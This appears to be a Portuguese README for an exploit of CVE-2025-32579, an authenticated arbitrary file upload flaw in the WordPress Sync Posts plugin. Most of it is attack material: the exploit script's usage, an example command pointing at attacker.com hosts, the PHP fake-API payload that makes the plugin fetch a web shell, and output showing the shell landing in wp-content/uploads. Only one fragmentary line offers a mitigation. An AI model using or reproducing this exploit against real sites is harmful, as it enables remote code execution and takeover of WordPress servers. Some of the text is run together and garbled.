
O WordPress Sync Posts Plugin <= 1.0 é vulnerável a Upload Arbitrário de Arquivos.
📦 Afeta: Sync Posts <= 1.0
🧨 Pontuação CVSS: 9.9 CRÍTICA
📁 Vetor CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
O Sync Posts plugin WordPress da SoftClever Limited é vulnerável a uma vulnerabilidade de Upload de Arquivo sem Restrições que permite que atacantes autenticados enviem e executem arquivos PHP arbitrários (como web shells) no servidor.
website_url que retorna posts JSON.wp-content/uploads.O script de exploit automatiza toda a cadeia:
<img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">website_url malicioso para admin-ajax.php?action=sync_posts/uploads/usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL
Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://target.com/wordpress)
-un, --username USERNAME
Username to login
-p, --password PASSWORD
Password to login
-ws, --website WEBSITE
URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
-shell, --webshell WEBSHELL
Web shell URL used inside the fake API (can be a test image)
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php
| Flag | Descrição |
|---|---|
-u, --url | URL do WordPress alvo |
-un, --username | Nome de usuário do WordPress (admin) |
-p, --password | Senha do WordPress |
-ws, --website | URL do arquivo PHP malicioso que retorna JSON de post falso |
-shell, --webshell | O arquivo shell real a ser injetado via `` |
Você também pode usar uma imagem dummy em vez de um shell real para testes:
--webshell https://via.placeholder.com/1x1.jpg
Esta é a resposta retornada por Khaled_alenazi.php:
<?php
header('Content-Type: application/json');
echo json_encode([
[
"id" => 1,
"title" => ["rendered" => "Nxploited"],
"content" => [
"rendered" => "<img src="http://attacker.com/shell.php">"
]
]
]);
?>
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
"success": true,
"data": {
"message": "Posts imported successfully",
...
}
}
shell.phpwp-content/uploads/2025/04/shell.phpwebsite_url a domínios internos ou hosts na lista de permissõesCVE: CVE-2025-32579
Exploit por Nxploited (Khaled Alenazi)